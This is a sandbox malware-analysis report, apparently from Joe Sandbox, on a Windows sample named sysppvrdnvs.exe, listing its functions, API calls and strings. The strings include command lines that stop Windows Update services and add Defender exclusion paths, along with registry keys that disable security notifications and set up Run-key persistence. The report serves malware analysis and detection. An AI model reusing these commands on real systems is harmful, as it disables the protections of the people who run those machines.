Associated: 00000006.00000002.1960076602.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.1960141722.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.1960162606.0000000000414000.00000004.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_sysppvrdnvs.jbxd

Yara matches

Similarity

API ID: Recv$ErrorLastSleep
String ID:
API String ID: 3668019968-0
Opcode ID: 632ea2d54cc4383f5132f6b2993607fdd6e2119cf45a08eb7173c4bd646593aa
Instruction ID: 470b9b0004fc9485880b3b0232d8394a6163a25caab740c915041083b8486df8
Opcode Fuzzy Hash: 632ea2d54cc4383f5132f6b2993607fdd6e2119cf45a08eb7173c4bd646593aa
Instruction Fuzzy Hash: 8811AD72148305AFD310CF65EC84AEBB7ECEB88710F40092EF945D2150E6B9E949A7B6

Function 00401AE0 Relevance: 6.0, APIs: 4, Instructions: 49networksleepCOMMON

Download Yara Rule

APIs

WSASend.WS2_32(?,?,00000001,?,00000000,?,00000000), ref: 00401B0C
WSAGetLastError.WS2_32 ref: 00401B12
Sleep.KERNEL32(00000001), ref: 00401B28
WSASend.WS2_32(?,?,00000001,?,00000000,?,00000000), ref: 00401B4A

Memory Dump Source

Source File: 00000006.00000002.1960106535.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.1960076602.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.1960141722.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.1960162606.0000000000414000.00000004.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_sysppvrdnvs.jbxd

Yara matches

Similarity

API ID: Send$ErrorLastSleep
String ID:
API String ID: 2121970615-0
Opcode ID: b06a38cb9fde64199f830136d194dacddc283b62bd49c201cde61758c607cabc
Instruction ID: 56798eeddd779857b304cdb020dc52eae5646efd672cabe94dca1e5c1b4e91c2
Opcode Fuzzy Hash: b06a38cb9fde64199f830136d194dacddc283b62bd49c201cde61758c607cabc
Instruction Fuzzy Hash: 90014B712483046EE7209B96DC88F9B77A8EBC8711F408429F608DA2D0D7B5A9459B7A

Function 0040DE90 Relevance: 6.0, APIs: 4, Instructions: 47COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(02D90634), ref: 0040DEA9
CloseHandle.KERNEL32(02D90638), ref: 0040DED8
LeaveCriticalSection.KERNEL32(02D90634), ref: 0040DEE7
DeleteCriticalSection.KERNEL32(02D90634), ref: 0040DEF4

Memory Dump Source

Source File: 00000006.00000002.1960106535.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.1960076602.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.1960141722.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.1960162606.0000000000414000.00000004.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_sysppvrdnvs.jbxd

Yara matches

Similarity

API ID: CriticalSection$CloseDeleteEnterHandleLeave
String ID:
API String ID: 3102160386-0
Opcode ID: 7ff1f6a6c7f609a02f2b7f0cb8a20d989c1467e854c2ae30cad7fe774086fae1
Instruction ID: ac11750a047aba6f79e7b8cc85f80e728fdbf261864cbbb5073f4aff0768140e
Opcode Fuzzy Hash: 7ff1f6a6c7f609a02f2b7f0cb8a20d989c1467e854c2ae30cad7fe774086fae1
Instruction Fuzzy Hash: 65115E74D00208EBDB08DF94D984A9DBB75FF48309F1081A9E806AB341D734EE94DB89

Function 004017A0 Relevance: 6.0, APIs: 4, Instructions: 47COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?,?,?,?,0040186C,?,?), ref: 004017B0
InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 004017C0
LeaveCriticalSection.KERNEL32(?,?,?,0040186C,?,?), ref: 004017CD
LeaveCriticalSection.KERNEL32(?,?,?,0040186C,?,?), ref: 00401808

Memory Dump Source

Source File: 00000006.00000002.1960106535.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.1960076602.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.1960141722.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.1960162606.0000000000414000.00000004.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_sysppvrdnvs.jbxd

Yara matches

Similarity

API ID: CriticalSection$Leave$EnterExchangeInterlocked
String ID:
API String ID: 2223660684-0
Opcode ID: 717484efd16090e76a5f6f50ec8c25be0b30b0b06e4d972f140238cc77205b64
Instruction ID: dfa7cd44099aa032f197b32b6ae0ce93fcebf173881def012ca395fa41330849
Opcode Fuzzy Hash: 717484efd16090e76a5f6f50ec8c25be0b30b0b06e4d972f140238cc77205b64
Instruction Fuzzy Hash: BD01F7356423049FC3209F26EC44ADB77F8AF49712B04443EE50693650DB34F545DB28

Function 0040E400 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 101COMMON

Download Yara Rule

APIs

Part of subcall function 0040E640: memset.NTDLL ref: 0040E668
Part of subcall function 0040E640: InternetCrackUrlA.WININET(0040E119,00000000,10000000,0000003C), ref: 0040E6B8
Part of subcall function 0040E640: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0040E6C8
Part of subcall function 0040E640: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040E701
Part of subcall function 0040E640: HttpOpenRequestA.WININET(00000000,GET,?,00000000,00000000,00000000,00000000,00000000), ref: 0040E737
Part of subcall function 0040E640: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0040E75F
Part of subcall function 0040E640: InternetReadFile.WININET(00000000,?,00000400,?), ref: 0040E7A8
Part of subcall function 0040E640: InternetCloseHandle.WININET(00000000), ref: 0040E837

Part of subcall function 0040E530: SysAllocString.OLEAUT32(00000000), ref: 0040E55E
Part of subcall function 0040E530: CoCreateInstance.OLE32(00413000,00000000,00004401,00412FF0,00000000), ref: 0040E586
Part of subcall function 0040E530: SysFreeString.OLEAUT32(00000000), ref: 0040E621

SysFreeString.OLEAUT32(00000000), ref: 0040E4DB
SysFreeString.OLEAUT32(00000000), ref: 0040E4E5

Strings

%S%S, xrefs: 0040E4C6

Memory Dump Source

Source File: 00000006.00000002.1960106535.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.1960076602.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.1960141722.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.1960162606.0000000000414000.00000004.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_sysppvrdnvs.jbxd

Yara matches

Similarity

API ID: Internet$String$Free$HttpOpenRequest$AllocCloseConnectCrackCreateFileHandleInstanceReadSendmemset
String ID: %S%S
API String ID: 1017111014-3267608656
Opcode ID: f492fb3745eed00b8c6f39d02d898e4ad1aa2c93a055282723199110ccf6299a
Instruction ID: e5c4592a6bf7e21b90caaa4e382eb9027ff93744cff569d410d2f086dfa1b48d
Opcode Fuzzy Hash: f492fb3745eed00b8c6f39d02d898e4ad1aa2c93a055282723199110ccf6299a
Instruction Fuzzy Hash: 41415CB5D00209AFCB04DFE5C885AEFB7B5BF48304F104929E605B7390E738AA41CBA1

Analysis Process: sysppvrdnvs.exePID: 4236, Parent PID: 4056COMMON

Execution Graph

Execution Coverage:	0.1%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	1500
Total number of Limit Nodes:	1

Executed Functions

Function 00407940 Relevance: 282.5, APIs: 103, Strings: 58, Instructions: 749
sleepfilesynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(000007D0), ref: 0040794E
CreateMutexA.KERNELBASE(00000000,00000000,mmn7nnm8na), ref: 0040795D
GetLastError.KERNEL32 ref: 00407969
ExitProcess.KERNEL32 ref: 00407978
GetModuleFileNameW.KERNEL32(00000000,004161D0,00000105), ref: 004079B2
PathFindFileNameW.SHLWAPI(004161D0), ref: 004079BD
wsprintfW.USER32 ref: 004079DA
DeleteFileW.KERNEL32(?), ref: 004079EA
ExpandEnvironmentStringsW.KERNEL32(%userprofile%,?,00000104), ref: 00407A01
wcscmp.NTDLL ref: 00407A13
ExitProcess.KERNEL32 ref: 00407A32

Strings

AntiSpywareOverride, xrefs: 00408155
%s:Zone.Identifier, xrefs: 004079CE
AntiVirusDisableNotify, xrefs: 00408193
%temp%, xrefs: 00407C3F
Start, xrefs: 00407E5E
SYSTEM\CurrentControlSet\Services\DoSvc, xrefs: 00407E8B
Windows Settings, xrefs: 00407AE7, 00407BD9, 00407CE2
SOFTWARE\Microsoft\Security Center\Svc, xrefs: 004081FE
SOFTWARE\Policies\Microsoft\Windows\UpdateOrchestrator, xrefs: 0040802D
Start, xrefs: 00407DAC
AntiVirusDisableNotify, xrefs: 004082AA
FirewallOverride, xrefs: 00408117
mmn7nnm8na, xrefs: 00407954
SYSTEM\CurrentControlSet\Services\BITS, xrefs: 00407EE4
%s\tbtnds.dat, xrefs: 0040833B
SYSTEM\CurrentControlSet\Services\wuauserv, xrefs: 00407E32
SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate, xrefs: 00407F3D
cmd.exe, xrefs: 00407D45
%s\%s, xrefs: 00407B4D
AntiVirusOverride, xrefs: 00408174
UpdatesDisableNotify, xrefs: 004081D1
%s\tbtcmds.dat, xrefs: 00408355
UpdatesOverride, xrefs: 004082C9
UpdatesDisableNotify, xrefs: 004082E8
EnableWindowsUpdate, xrefs: 0040809B
UpdatesOverride, xrefs: 004081B2
%s\%s, xrefs: 00407A5B
FirewallDisableNotify, xrefs: 00408136
Software\Microsoft\Windows\CurrentVersion\Run\, xrefs: 00407B9B
Start, xrefs: 00407F10
SYSTEM\CurrentControlSet\Services\UsoSvc, xrefs: 00407D80
AutoUpdateOptions, xrefs: 0040807C
cmd.exe, xrefs: 00407D60
DisableWindowsUpdate, xrefs: 00407F69
open, xrefs: 00407D65
/c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop DoSvc & sc stop BITS /wait, xrefs: 00407D5B
Software\Microsoft\Windows\CurrentVersion\Run\, xrefs: 00407CA4
FirewallOverride, xrefs: 0040822E
/c powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -, xrefs: 00407D40
OverrideNotice, xrefs: 00408000
DisableWindowsUpdate, xrefs: 0040805D
FirewallDisableNotify, xrefs: 0040824D
PreventDownload, xrefs: 004080BA
%windir%, xrefs: 00407A44
SYSTEM\CurrentControlSet\Services\WaaSMedicSvc, xrefs: 00407DD9
Start, xrefs: 00407E05
SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU, xrefs: 00407F96
AlwaysAutoUpdate, xrefs: 00407FE1
%s\%s, xrefs: 00407C56
NoAutoUpdate, xrefs: 00407FC2
open, xrefs: 00407D4A
SOFTWARE\Microsoft\Security Center, xrefs: 004080E7
Start, xrefs: 00407EB7
AntiSpywareOverride, xrefs: 0040826C
sysppvrdnvs.exe, xrefs: 00407A07, 00407A4F, 00407B41, 00407C4A
AntiVirusOverride, xrefs: 0040828B
%userprofile%, xrefs: 004079FC
Software\Microsoft\Windows\CurrentVersion\Run\, xrefs: 00407AA9

Memory Dump Source

Source File: 00000013.00000002.1610597964.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000013.00000002.1610547356.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.1610696974.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.1610723506.0000000000414000.00000008.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_400000_sysppvrdnvs.jbxd

Yara matches

Similarity

API ID: File$ExitNameProcess$CreateDeleteEnvironmentErrorExpandFindLastModuleMutexPathSleepStringswcscmpwsprintf
String ID: %s:Zone.Identifier$%s\%s$%s\%s$%s\%s$%s\tbtcmds.dat$%s\tbtnds.dat$%temp%$%userprofile%$%windir%$/c powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -$/c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop DoSvc & sc stop BITS /wait$AlwaysAutoUpdate$AntiSpywareOverride$AntiSpywareOverride$AntiVirusDisableNotify$AntiVirusDisableNotify$AntiVirusOverride$AntiVirusOverride$AutoUpdateOptions$DisableWindowsUpdate$DisableWindowsUpdate$EnableWindowsUpdate$FirewallDisableNotify$FirewallDisableNotify$FirewallOverride$FirewallOverride$NoAutoUpdate$OverrideNotice$PreventDownload$SOFTWARE\Microsoft\Security Center$SOFTWARE\Microsoft\Security Center\Svc$SOFTWARE\Policies\Microsoft\Windows\UpdateOrchestrator$SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate$SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU$SYSTEM\CurrentControlSet\Services\BITS$SYSTEM\CurrentControlSet\Services\DoSvc$SYSTEM\CurrentControlSet\Services\UsoSvc$SYSTEM\CurrentControlSet\Services\WaaSMedicSvc$SYSTEM\CurrentControlSet\Services\wuauserv$Software\Microsoft\Windows\CurrentVersion\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Start$Start$Start$Start$Start$UpdatesDisableNotify$UpdatesDisableNotify$UpdatesOverride$UpdatesOverride$Windows Settings$cmd.exe$cmd.exe$mmn7nnm8na$open$open$sysppvrdnvs.exe
API String ID: 4172876685-159212852
Opcode ID: a4de16f9cd9a57b13bb64e1272bcdec428ac0ec926cd71be17685e2324921950
Instruction ID: 367eef7d7cdc4f6bbf58631969cb55eb0d30a7b17f9c19f9a6cac2e90da0940f
Opcode Fuzzy Hash: a4de16f9cd9a57b13bb64e1272bcdec428ac0ec926cd71be17685e2324921950
Instruction Fuzzy Hash: 245240B1A80318BBE7209BA0DC4AFD97775AB48B15F1081A5B309B61D0D7F5AAC4CF5C

Non-executed Functions

Function 004068E0 Relevance: 105.4, APIs: 47, Strings: 13, Instructions: 407
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_chkstk.NTDLL(?,004070E0,?,?,?), ref: 004068E8
wsprintfW.USER32 ref: 0040691F
wsprintfW.USER32 ref: 0040693F
wsprintfW.USER32 ref: 0040695F
wsprintfW.USER32 ref: 0040697F
wsprintfW.USER32 ref: 00406998
wsprintfW.USER32 ref: 004069B8
PathFileExistsW.SHLWAPI(?), ref: 004069C8
SetFileAttributesW.KERNEL32(?,00000080), ref: 00406A01
DeleteFileW.KERNEL32(?), ref: 00406A0E
PathFileExistsW.SHLWAPI(?), ref: 00406A1B
PathFileExistsW.SHLWAPI(?), ref: 00406A30
SetFileAttributesW.KERNEL32(?,00000080), ref: 00406A46
DeleteFileW.KERNEL32(?), ref: 00406A53
PathFileExistsW.SHLWAPI(?), ref: 00406A60
CreateDirectoryW.KERNEL32(?,00000000), ref: 00406A73

Strings

shell32.dll, xrefs: 00406C38
%s\%s, xrefs: 00406933
%s\%s, xrefs: 00406E4D
shell32.dll, xrefs: 00406BFC
shell32.dll, xrefs: 00406C16
%s\%s\rvlcfg.exe, xrefs: 00406953
%s\*, xrefs: 0040698C
%s\%s, xrefs: 00406973
shell32.dll, xrefs: 00406C52
%s\%s\rvldrv.exe, xrefs: 004069AC
%s.lnk, xrefs: 00406913
%s\%s, xrefs: 00406EC0
%s\%s\%s, xrefs: 00406EE7

Memory Dump Source

Source File: 00000013.00000002.1610597964.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000013.00000002.1610547356.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.1610696974.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.1610723506.0000000000414000.00000008.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_400000_sysppvrdnvs.jbxd

Yara matches

Similarity

API ID: File$wsprintf$ExistsPath$AttributesDelete$CreateDirectory_chkstk
String ID: %s.lnk$%s\%s$%s\%s$%s\%s$%s\%s$%s\%s\%s$%s\%s\rvlcfg.exe$%s\%s\rvldrv.exe$%s\*$shell32.dll$shell32.dll$shell32.dll$shell32.dll
API String ID: 495142193-638321828
Opcode ID: bba10b6da6457b63d7fe7870a3bcf93d38d67b95bd357d565e7f9915594a4b88
Instruction ID: 1e7642a3bb229a683b77cec8f60a4b6186945a0df842d4041ba496de3fd539ef
Opcode Fuzzy Hash: bba10b6da6457b63d7fe7870a3bcf93d38d67b95bd357d565e7f9915594a4b88
Instruction Fuzzy Hash: 500270B5900218EBDB20DB60DC44FEA7778BF44705F0485EAF50AA6190DBB89BD4CF69

Function 004067A0 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 85
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateDirectoryW.KERNEL32(00406F1A,00000000), ref: 004067AF
wsprintfW.USER32 ref: 004067C5
FindFirstFileW.KERNEL32(?,?), ref: 004067DC
lstrcmpW.KERNEL32(?,00411368), ref: 00406801
lstrcmpW.KERNEL32(?,0041136C), ref: 00406817
wsprintfW.USER32 ref: 0040683A
wsprintfW.USER32 ref: 0040685A
MoveFileExW.KERNEL32(?,?,00000009), ref: 00406896
FindNextFileW.KERNEL32(000000FF,?), ref: 004068AA
FindClose.KERNEL32(000000FF), ref: 004068BF
RemoveDirectoryW.KERNEL32(?), ref: 004068C9

Strings

%s\%s, xrefs: 0040682E
%s\%s, xrefs: 0040684E
%s\*, xrefs: 004067B9

Memory Dump Source

Source File: 00000013.00000002.1610597964.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000013.00000002.1610547356.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.1610696974.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.1610723506.0000000000414000.00000008.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_400000_sysppvrdnvs.jbxd

Yara matches

Similarity

API ID: FileFindwsprintf$Directorylstrcmp$CloseCreateFirstMoveNextRemove
String ID: %s\%s$%s\%s$%s\*
API String ID: 92872011-445461498
Opcode ID: e29d1c6c13065a126f61562b4b6d2eaef25e121113ba2b4fb370d418db62171d
Instruction ID: 96f5080d1998a7d60275ba97af61759e4b4e94f5b4bc08b7936e0b3de653678a
Opcode Fuzzy Hash: e29d1c6c13065a126f61562b4b6d2eaef25e121113ba2b4fb370d418db62171d
Instruction Fuzzy Hash: 923145B5900218AFDB10DBA0DC88FDA7778BB48701F40C5E9F609A3195DA75EAD4CF98

Function 0040E190 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 117networkstringCOMMON

Download Yara Rule

APIs

socket.WS2_32(00000002,00000002,00000011), ref: 0040E1AA
htons.WS2_32(0000076C), ref: 0040E1E0
inet_addr.WS2_32(239.255.255.250), ref: 0040E1EF
setsockopt.WS2_32(000000FF,0000FFFF,00000020,00000001,00000001), ref: 0040E20D

Part of subcall function 0040B430: htons.WS2_32(00000050), ref: 0040B45D
Part of subcall function 0040B430: socket.WS2_32(00000002,00000001,00000000), ref: 0040B47D
Part of subcall function 0040B430: connect.WS2_32(000000FF,?,00000010), ref: 0040B496
Part of subcall function 0040B430: getsockname.WS2_32(000000FF,?,00000010), ref: 0040B4C8

bind.WS2_32(000000FF,?,00000010), ref: 0040E243
lstrlenA.KERNEL32(X#A,00000000,?,00000010), ref: 0040E25C
sendto.WS2_32(000000FF,X#A,00000000), ref: 0040E26B
ioctlsocket.WS2_32(000000FF,8004667E,00000001), ref: 0040E285

Part of subcall function 0040E310: recvfrom.WS2_32(000000FF,?,00000400,00000000,00000000,00000000), ref: 0040E35E
Part of subcall function 0040E310: Sleep.KERNEL32(000003E8), ref: 0040E36E
Part of subcall function 0040E310: StrCmpNIA.SHLWAPI(?,HTTP/1.1 200 OK,0000000F), ref: 0040E38B
Part of subcall function 0040E310: StrStrIA.SHLWAPI(?,LOCATION: ), ref: 0040E3A1
Part of subcall function 0040E310: StrChrA.SHLWAPI(?,0000000D), ref: 0040E3CE

Strings

X#A, xrefs: 0040E258, 0040E25B
239.255.255.250, xrefs: 0040E1EA

Memory Dump Source

Source File: 00000013.00000002.1610597964.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000013.00000002.1610547356.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.1610696974.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.1610723506.0000000000414000.00000008.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_400000_sysppvrdnvs.jbxd

Yara matches

Similarity

API ID: htonssocket$Sleepbindconnectgetsocknameinet_addrioctlsocketlstrlenrecvfromsendtosetsockopt
String ID: 239.255.255.250$X#A
API String ID: 726339449-2206458040
Opcode ID: 6911e90d37da8db62bd51864f6155ca9886bbc89aad1387f27fc75aef26ea545
Instruction ID: e8e0ae0e245dd7c097b927a75a8676c49a2f7ecfee9f68fb0cb72d84dadb0e27
Opcode Fuzzy Hash: 6911e90d37da8db62bd51864f6155ca9886bbc89aad1387f27fc75aef26ea545
Instruction Fuzzy Hash: 7F4119B4E00208ABDB04DFE4D989BEEBBB5EF48304F108569F505B7390E7B55A44CB59

Function 00402020 Relevance: 16.6, APIs: 11, Instructions: 131networkCOMMON

Download Yara Rule

APIs

GetSystemInfo.KERNEL32(?,?), ref: 00402043
InitializeCriticalSection.KERNEL32(00000020), ref: 00402057
CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 00402065
CreateIoCompletionPort.KERNEL32(000000FF,00000000,00000000,00000000), ref: 0040207E

Part of subcall function 0040DBB0: InitializeCriticalSection.KERNEL32(-00000004), ref: 0040DBCE

WSASocketA.WS2_32(00000002,00000001,00000006,00000000,00000000,00000001), ref: 004020AB
setsockopt.WS2_32 ref: 004020D1
htons.WS2_32(?), ref: 00402101
bind.WS2_32(?,0000FFFF,00000010), ref: 00402117
listen.WS2_32(?,7FFFFFFF), ref: 0040212F
WSACreateEvent.WS2_32 ref: 0040213A
WSAEventSelect.WS2_32(?,00000000,00000008), ref: 0040214E

Part of subcall function 0040DBE0: EnterCriticalSection.KERNEL32(-00000004,00000000), ref: 0040DC04
Part of subcall function 0040DBE0: CreateThread.KERNEL32(00000000,?,00000000,?,00000000,?), ref: 0040DC5F
Part of subcall function 0040DBE0: GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002), ref: 0040DC9C
Part of subcall function 0040DBE0: GetCurrentProcess.KERNEL32(00000000,00000000), ref: 0040DCA7
Part of subcall function 0040DBE0: DuplicateHandle.KERNEL32(00000000), ref: 0040DCAE
Part of subcall function 0040DBE0: LeaveCriticalSection.KERNEL32(-00000004), ref: 0040DCC2

Memory Dump Source

Source File: 00000013.00000002.1610597964.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000013.00000002.1610547356.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.1610696974.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.1610723506.0000000000414000.00000008.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_400000_sysppvrdnvs.jbxd

Yara matches

Similarity

API ID: CreateCriticalSection$Event$CurrentInitializeProcess$CompletionDuplicateEnterHandleInfoLeavePortSelectSocketSystemThreadbindhtonslistensetsockopt
String ID:
API String ID: 1603358586-0
Opcode ID: 12e9ac71e1e64606d6e310d867efcd3aad974152cf34b1f89b4218bf20e906ed
Instruction ID: 7304e093e5df1f4af0f3941d52a0ba2ce6ba101da239ecb0b9d238ba0c2be26e
Opcode Fuzzy Hash: 12e9ac71e1e64606d6e310d867efcd3aad974152cf34b1f89b4218bf20e906ed
Instruction Fuzzy Hash: EE41B170640301ABD3209F74CC4AF5B77E4AF44720F108A2DF6A9EA2D4E7F4E545875A

Function 00401470 Relevance: 9.1, APIs: 6, Instructions: 89networkthreadCOMMON

Download Yara Rule

APIs

CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 004014B2
socket.WS2_32(00000002,00000002,00000011), ref: 004014C1
htons.WS2_32(?), ref: 00401508
setsockopt.WS2_32(?,0000FFFF), ref: 0040152A
bind.WS2_32(?,?,00000010), ref: 0040153B

Part of subcall function 00401330: SetEvent.KERNEL32(?,00000000,?,0040154C,00000000), ref: 00401346
Part of subcall function 00401330: WaitForSingleObject.KERNEL32(?,000000FF), ref: 00401352
Part of subcall function 00401330: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040135C

CreateThread.KERNEL32(00000000,00000000,00401100,00000000,00000000,00000000), ref: 00401569

Memory Dump Source

Source File: 00000013.00000002.1610597964.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000013.00000002.1610547356.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.1610696974.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.1610723506.0000000000414000.00000008.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_400000_sysppvrdnvs.jbxd

Yara matches

Similarity

API ID: CreateEvent$CloseHandleObjectSingleThreadWaitbindhtonssetsockoptsocket
String ID:
API String ID: 4174406920-0
Opcode ID: 93d4027be7e49e3bb9003fc5ae654a5e9afe1d061a8d67f74f828f69ef3a14c4
Instruction ID: 62ed05d6da85abd953b38b2f92cd08377c0ec6205023cd889ce16e316194a11c
Opcode Fuzzy Hash: 93d4027be7e49e3bb9003fc5ae654a5e9afe1d061a8d67f74f828f69ef3a14c4
Instruction Fuzzy Hash: 1731F971A443016BE320DF749C46F9BB6E0AF48B10F40493DF659EB2D0D3B4D544879A

Function 0040D770 Relevance: 9.1, APIs: 6, Instructions: 67sleepnetworkCOMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 0040D782
ioctlsocket.WS2_32(00000004,4004667F,00000000), ref: 0040D7A8
recv.WS2_32(00000004,00002710,000000FF,00000000), ref: 0040D7DF
GetTickCount.KERNEL32 ref: 0040D7F4
Sleep.KERNEL32(00000001), ref: 0040D814
GetTickCount.KERNEL32 ref: 0040D81A

Memory Dump Source

Source File: 00000013.00000002.1610597964.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000013.00000002.1610547356.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.1610696974.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.1610723506.0000000000414000.00000008.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_400000_sysppvrdnvs.jbxd

Yara matches

Similarity

API ID: CountTick$Sleepioctlsocketrecv
String ID:
API String ID: 107502007-0
Opcode ID: 37a822bdddda98564e28443683f910c137df2279eb61dd0ccc6bd5f83a2e5522
Instruction ID: 457d80db37ae817004d1223b894239af033459ee6c7143085fc0b5fbd1cdb933
Opcode Fuzzy Hash: 37a822bdddda98564e28443683f910c137df2279eb61dd0ccc6bd5f83a2e5522
Instruction Fuzzy Hash: 13310A75D00209EFCB04DFA4D948AEEBBB0FF44315F10866AE821A7280D7749A54CB99

Function 0040B430 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 60networkCOMMON

Download Yara Rule

APIs

htons.WS2_32(00000050), ref: 0040B45D

Part of subcall function 0040B3F0: inet_addr.WS2_32(0040B471), ref: 0040B3FA
Part of subcall function 0040B3F0: gethostbyname.WS2_32(?), ref: 0040B40D

socket.WS2_32(00000002,00000001,00000000), ref: 0040B47D
connect.WS2_32(000000FF,?,00000010), ref: 0040B496
getsockname.WS2_32(000000FF,?,00000010), ref: 0040B4C8

Strings

www.update.microsoft.com, xrefs: 0040B467

Memory Dump Source

Source File: 00000013.00000002.1610597964.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000013.00000002.1610547356.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.1610696974.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.1610723506.0000000000414000.00000008.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_400000_sysppvrdnvs.jbxd

Yara matches

Similarity

API ID: connectgethostbynamegetsocknamehtonsinet_addrsocket
String ID: www.update.microsoft.com
